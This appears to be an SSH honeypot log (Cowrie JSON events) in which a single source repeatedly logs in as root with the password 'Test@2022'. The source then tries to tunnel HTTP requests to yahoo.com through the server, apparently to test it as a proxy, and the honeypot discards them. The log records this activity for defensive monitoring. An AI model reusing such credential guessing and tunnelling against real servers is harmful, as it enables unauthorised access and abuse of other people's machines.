{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.920616Z","src_ip":"213.209.150.239","session":"ea269ba3a503"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.155714Z","src_ip":"213.209.150.239","session":"ea269ba3a503"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":21206,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:21206","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.203935Z","session":"ea269ba3a503"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.251385Z","src_ip":"213.209.150.239","session":"ea269ba3a503"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26891,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26891","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.385476Z","session":"ea269ba3a503"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.432540Z","src_ip":"213.209.150.239","session":"ea269ba3a503"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.481454Z","src_ip":"213.209.150.239","session":"ea269ba3a503"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33066,"dst_ip":"1.2.3.4","dst_port":22,"session":"5942800f9f58","protocol":"ssh","message":"New connection: 213.209.150.239:33066 (1.2.3.4:22) [session: 5942800f9f58]","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.536927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.537632Z","src_ip":"213.209.150.239","session":"5942800f9f58"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.594042Z","src_ip":"213.209.150.239","session":"5942800f9f58"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.875756Z","src_ip":"213.209.150.239","session":"5942800f9f58"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":12266,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:12266","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.933793Z","session":"5942800f9f58"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:45.990312Z","src_ip":"213.209.150.239","session":"5942800f9f58"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":2399,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2399","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.146896Z","session":"5942800f9f58"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.203455Z","src_ip":"213.209.150.239","session":"5942800f9f58"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.260644Z","src_ip":"213.209.150.239","session":"5942800f9f58"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33119,"dst_ip":"1.2.3.4","dst_port":22,"session":"78a7c4da71cd","protocol":"ssh","message":"New connection: 213.209.150.239:33119 (1.2.3.4:22) [session: 78a7c4da71cd]","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.307116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.307872Z","src_ip":"213.209.150.239","session":"78a7c4da71cd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.355285Z","src_ip":"213.209.150.239","session":"78a7c4da71cd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.590264Z","src_ip":"213.209.150.239","session":"78a7c4da71cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":28508,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:28508","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.638886Z","session":"78a7c4da71cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.686343Z","src_ip":"213.209.150.239","session":"78a7c4da71cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6592,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6592","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.822103Z","session":"78a7c4da71cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.869700Z","src_ip":"213.209.150.239","session":"78a7c4da71cd"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.917996Z","src_ip":"213.209.150.239","session":"78a7c4da71cd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33167,"dst_ip":"1.2.3.4","dst_port":22,"session":"4019621a472a","protocol":"ssh","message":"New connection: 213.209.150.239:33167 (1.2.3.4:22) [session: 4019621a472a]","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.973808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:46.974702Z","src_ip":"213.209.150.239","session":"4019621a472a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.031299Z","src_ip":"213.209.150.239","session":"4019621a472a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.314425Z","src_ip":"213.209.150.239","session":"4019621a472a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":94,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:94","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.371973Z","session":"4019621a472a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.428727Z","src_ip":"213.209.150.239","session":"4019621a472a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":551,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:551","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.583021Z","session":"4019621a472a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.639713Z","src_ip":"213.209.150.239","session":"4019621a472a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.697081Z","src_ip":"213.209.150.239","session":"4019621a472a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33253,"dst_ip":"1.2.3.4","dst_port":22,"session":"112b9da6d94f","protocol":"ssh","message":"New connection: 213.209.150.239:33253 (1.2.3.4:22) [session: 112b9da6d94f]","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.752453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.753498Z","src_ip":"213.209.150.239","session":"112b9da6d94f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:47.810139Z","src_ip":"213.209.150.239","session":"112b9da6d94f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.091495Z","src_ip":"213.209.150.239","session":"112b9da6d94f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":715,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:715","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.149381Z","session":"112b9da6d94f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.206041Z","src_ip":"213.209.150.239","session":"112b9da6d94f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":6737,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6737","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.362763Z","session":"112b9da6d94f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.419198Z","src_ip":"213.209.150.239","session":"112b9da6d94f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.477314Z","src_ip":"213.209.150.239","session":"112b9da6d94f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33325,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ba3271f82c4","protocol":"ssh","message":"New connection: 213.209.150.239:33325 (1.2.3.4:22) [session: 3ba3271f82c4]","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.523746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:48.524390Z","src_ip":"213.209.150.239","session":"3ba3271f82c4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 